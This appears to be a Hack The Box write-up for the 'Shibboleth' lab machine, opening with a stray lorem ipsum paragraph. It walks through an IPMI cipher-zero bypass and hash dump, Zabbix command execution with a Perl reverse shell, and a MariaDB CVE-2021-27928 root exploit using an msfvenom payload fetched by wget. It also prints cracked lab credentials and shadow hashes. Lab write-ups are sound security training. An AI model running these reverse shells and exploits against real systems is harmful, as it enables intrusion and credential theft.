Shibboleth - Hack The Box
“Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.”
USER
Step 1
nmap:
┌──(void㉿void)-[/htb/shibboleth]
└─$ nmap -Pn -n -sCV 10.10.11.124
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb
┌──(void㉿void)-[/htb/shibboleth]
└─$ sudo nmap -sU shibboleth.htb
PORT STATE SERVICE
623/udp open asf-rmcp
dirb:
==> DIRECTORY: http://shibboleth.htb/assets/
==> DIRECTORY: http://shibboleth.htb/forms/
+ http://shibboleth.htb/index.html (CODE:200|SIZE:59474)
+ http://shibboleth.htb/server-status (CODE:403|SIZE:279)
nikto:
+ Server: Apache/2.4.41 (Ubuntu)
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
ffuf:
┌──(void㉿void)-[/htb/shibboleth]
└─$ ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://shibboleth.htb -H "Host: FUZZ.shibboleth.htb" -fl 10
[... snip ...]
monitoring [Status: 200, Size: 3686, Words: 192, Lines: 30]
monitor [Status: 200, Size: 3686, Words: 192, Lines: 30]
- 4 employees on shibboleth.htb
./namemash.py /htb/shibboleth/users.txt > /htb/shibboleth/user-mash.txt
- Zabbix v5.x on monitor.shibboleth.htb
- IPMI-2.0 on UDP 623
Reading about IPMI-2.0 there is a serious vulnerability via “Cipher 0”, leading to a authentication bypass. To identify if the target is vulnerable we can use:
msf6 > use auxiliary/scanner/ipmi/ipmi_version
msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhosts 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_version) > run
[*] Sending IPMI requests to 10.10.11.124->10.10.11.124 (1 hosts)
[+] 10.10.11.124:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)
msf6 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set rhosts 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run
[*] Sending IPMI requests to 10.10.11.124->10.10.11.124 (1 hosts)
[+] 10.10.11.124:623 - IPMI - VULNERABLE: Accepted a session open request for cipher zero
We can abuse this issue with ipmitool, however it requires a valid user so loop through different user lists to get a hit.
┌──(void㉿void)-[/htb/shibboleth]
└─$ for i in $(cat /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt); do ipmitool -I lanplus -C 0 -H 10.10.11.124 -U $i -P randomjunkpass user list; done
Error: Unable to establish IPMI v2 / RMCP+ session
Error: Unable to establish IPMI v2 / RMCP+ session
Error: Unable to establish IPMI v2 / RMCP+ session
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 true false false USER
2 Administrator true false true USER
3 true false false Unknown (0x00)
4 true false false Unknown (0x00)
5 true false false Unknown (0x00)
6 true false false Unknown (0x00)
7 true false false Unknown (0x00)
8 true false false Unknown (0x00)
9 true false false Unknown (0x00)
10 true false false Unknown (0x00)
11 true false false Unknown (0x00)
12 true false false Unknown (0x00)
13 true false false Unknown (0x00)
14 true false false Unknown (0x00)
15 true false false Unknown (0x00)
16 true false false Unknown (0x00)
17 true false false Unknown (0x00)
18 true false false Unknown (0x00)
19 true false false Unknown (0x00)
20 true false false Unknown (0x00)
21 true false false Unknown (0x00)
22 true false false Unknown (0x00)
23 true false false Unknown (0x00)
24 true false false Unknown (0x00)
25 true false false Unknown (0x00)
26 true false false Unknown (0x00)
27 true false false Unknown (0x00)
28 true false false Unknown (0x00)
29 true false false Unknown (0x00)
30 true false false Unknown (0x00)
31 true false false Unknown (0x00)
32 true false false Unknown (0x00)
33 true false false Unknown (0x00)
34 true false false Unknown (0x00)
35 true false false Unknown (0x00)
36 true false false Unknown (0x00)
37 true false false Unknown (0x00)
38 true false false Unknown (0x00)
39 true false false Unknown (0x00)
40 true false false Unknown (0x00)
41 true false false Unknown (0x00)
42 true false false Unknown (0x00)
43 true false false Unknown (0x00)
44 true false false Unknown (0x00)
45 true false false Unknown (0x00)
46 true false false Unknown (0x00)
47 true false false Unknown (0x00)
48 true false false Unknown (0x00)
49 true false false Unknown (0x00)
50 true false false Unknown (0x00)
51 true false false Unknown (0x00)
52 true false false Unknown (0x00)
53 true false false Unknown (0x00)
54 true false false Unknown (0x00)
55 true false false Unknown (0x00)
56 true false false Unknown (0x00)
57 true false false Unknown (0x00)
58 true false false Unknown (0x00)
59 true false false Unknown (0x00)
60 true false false Unknown (0x00)
61 true false false Unknown (0x00)
62 true false false Unknown (0x00)
63 true false false Unknown (0x00)
Error: Unable to establish IPMI v2 / RMCP+ session
Error: Unable to establish IPMI v2 / RMCP+ session
Error: Unable to establish IPMI v2 / RMCP+ session
Step 2
With a known IPMI user we can extract it’s password hash using scanner/ipmi/ipmi_dumphashes, change the Administrator password using ipmitool, or even create a new user. Because of OPSEC reasons we chose to go with the first.
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:25c57b7b8405000008904066caa92e976c68e804989073044e82977617542af3e0def24a61f3bb61a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:9bcd1814a60990cec7b9579c2236c1a55465af4a
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Crack the hash with hashcat:
PS C:\tools\hashcat-6.2.4> .\hashcat.exe -a0 -m7300 .\administrator-ipmi.txt .\rockyou.txt
[... snip ...]
25c57b7b8405000008904066caa92e976c68e804989073044e82977617542af3e0def24a61f3bb61a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:9bcd1814a60990cec7b9579c2236c1a55465af4a:ilovepumkinpie1
Session..........: hashcat
Status...........: Cracked
Credentials found! Administrator:ilovepumkinpie1
The credentials work in Zabbix, giving us an Initial Foothold.
BONUS: Create ADMINISTRATOR User (not relevant for this box)
$ ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P randomjunkpass user set name 3 p3
$ ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P randomjunkpass user set password 3 p3
Set User Password command successful (user 3)
$ ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P randomjunkpass user set priv 3 4
User Commands:
summary [<channel number>]
list [<channel number>]
set name <user id> <username>
set password <user id> [<password> <16|20>]
disable <user id>
enable <user id>
priv <user id> <privilege level> [<channel number>]
Privilege levels:
* 0x1 - Callback
* 0x2 - User
* 0x3 - Operator
* 0x4 - Administrator
* 0x5 - OEM Proprietary
* 0xF - No Access
test <user id> <16|20> [<password]>
$ ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P randomjunkpass user priv 3 4 1 ⨯
Set Privilege Level command successful (user 3)
$ ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P randomjunkpass user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 true false false USER
2 Administrator true false true USER
3 p3 true false false ADMINISTRATOR
Step 3
After a LOT of time going through Zabbix I found this post explaining how to execute commands from the server through items.
First, go to Configuration > Hosts > Items
![[Pasted image 20211124085038.png]]
In the top right corner, press Create Item. Name it to whatever and in the Key-field execute code with the syntax: system.run[command]. Save your new item, press on it to and in the bottom row press Execute now. A simple ping POC would look like this:
![[Pasted image 20211124085238.png]]
![[Pasted image 20211124085403.png]]
Trying to execute one liners directly through the GUI gives me a shell that closes down only after a few seconds. So instead I host a local HTTP Server that exposes a pearl one-liner, and trigger it using curl from the GUI.
$ cat rev.sh
perl -e 'use Socket;$i="10.10.14.6";$p=4488;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
![[Pasted image 20211124092000.png]]
┌──(void㉿void)-[/htb/shibboleth]
└─$ nc -lvnp 4488
listening on [any] 4488 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.124] 38550
/bin/sh: 0: can't access tty; job control turned off
$ id && hostname
uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)
shibboleth
Step 4
The admin loves password re-use; change to user ipmi-svc password ilovepumkinpie1.
zabbix@shibboleth:/$ su ipmi-svc
Password: ilovepumkinpie1
ipmi-svc@shibboleth:/$ cd
ipmi-svc@shibboleth:~$ cat user.txt
1c61257210be4a423aeae88f727c2412
ROOT
Step 1
Sorry, user ipmi-svc may not run sudo on shibboleth.
Looking for passwords etc in /etc/zabbix we find database credentials. From the database we are able to extract three bcrypt ($2*$) hashes, however we already know Administrator.
ipmi-svc@shibboleth:/etc/zabbix$ cat zabbix_server.conf
[... snip ...]
DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh
ipmi-svc@shibboleth:/etc/zabbix$ mysql zabbix -u zabbix -p
Enter password: bloooarskybluh
MariaDB [zabbix]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| zabbix |
+--------------------+
MariaDB [zabbix]> select * from users;
+--------+---------------+--------------+---------------+--------------------------------------------------------------+-----+-----------+------------+-------+---------+------+------------+----------------+---------------+---------------+---------------+
| userid | alias | name | surname | passwd | url | autologin | autologout | lang | refresh | type | theme | attempt_failed | attempt_ip | attempt_clock | rows_per_page |
+--------+---------------+--------------+---------------+--------------------------------------------------------------+-----+-----------+------------+-------+---------+------+------------+----------------+---------------+---------------+---------------+
| 1 | Admin | Zabbix | Administrator | $2y$10$L9tjKByfruByB.BaTQJz/epcbDQta4uRM/KySxSZTwZkMGuKTPPT2 | | 0 | 0 | en_GB | 60s | 3 | dark-theme | 0 | 192.168.139.9 | 1619285020 | 50 |
| 2 | guest | | | $2y$10$89otZrRNmde97rIyzclecuk6LwKAsHN0BcvoOKGjbT.BwMBfm7G06 | | 0 | 15m | en_GB | 30s | 1 | default | 0 | | 0 | 50 |
| 3 | Administrator | IPMI Service | Account | $2y$10$FhkN5OCLQjs3d6C.KtQgdeCc485jKBWPW4igFVEgtIP3jneaN7GQe | | 0 | 0 | en_GB | 60s | 2 | default | 0 | | 0 | 50 |
+--------+---------------+--------------+---------------+--------------------------------------------------------------+-----+-----------+------------+-------+---------+------+------------+----------------+---------------+---------------+---------------+
Cracking the hashes is however useless and probably a rabbit hole. Guest comes back empty and after 30 minutes I gave up with Admin.
Step 2
Digging around further into the running process we can see that mysql is running as root, something that’s not best practice at all.
ipmi-svc@shibboleth:/etc/ayelow$ ps aux | grep root
[... snip ...]
root 1252 0.0 0.0 2608 1732 ? S 07:08 0:00 /bin/sh /usr/bin/mysqld_safe
root 1412 0.5 3.5 1729516 143560 ? Sl 07:08 0:49 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/x86_64-linux-gnu/mariadb19/plugin --user=root --skip-log-error --pid-file=/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock
Reading around for vulnerabilities for MariaDB v10.3.25 I come across CVE-2021-27928 which allows an authenticated attacker to execute OS commands as the user running the SQL service. Sound perfect to us!
┌──(void㉿void)-[/htb/shibboleth]
└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4499 -f elf-so -o CVE-2021-27928.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf-so file: 476 bytes
Saved as: CVE-2021-27928.so
ipmi-svc@shibboleth:/dev/shm$ wget http://10.10.14.6/CVE-2021-27928.so
ipmi-svc@shibboleth:/dev/shm$ mysql -u zabbix -p -h 127.0.0.1 -e 'SET GLOBAL wsrep_provider="/dev/shm/CVE-2021-27928.so";'
Enter password:
ERROR 2013 (HY000) at line 1: Lost connection to MySQL server during query
┌──(void㉿void)-[/htb/shibboleth]
└─$ nc -lvnp 4499
listening on [any] 4499 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.124] 33832
id && hostname
uid=0(root) gid=0(root) groups=0(root)
shibboleth
cat /root/root.txt
04543075052e692020a01b60d8670c0f
cat /etc/shadow
[... snip ...]
root:$6$HeRqkRJL9pttp4EY$TBE4vztPy9lOaywPhVdhQHwiPa09s7RJw418EMjmS0RKea/1QBwLqTHK84ato5yDBF59dMvSNbQQ1pVy.K1dp.:18741:0:99999:7:::
ipmi-svc:$6$rnKUQQE9QwT1bVVt$7JWeqxtaYfMZa0EO0clguLK4Fh3N/IN6djXUl2M2MQ5PHVmQ1vLwlxnNMVhn7y/oEpjltVyvbw1wbBBZ//apV.:18925:0:99999:7:::
References
zabbix agent code execution: https://stackoverflow.com/questions/24222086/how-to-run-command-on-zabbix-agents
mariadb os command execution: https://packetstormsecurity.com/files/162177/MariaDB-10.2-Command-Execution.html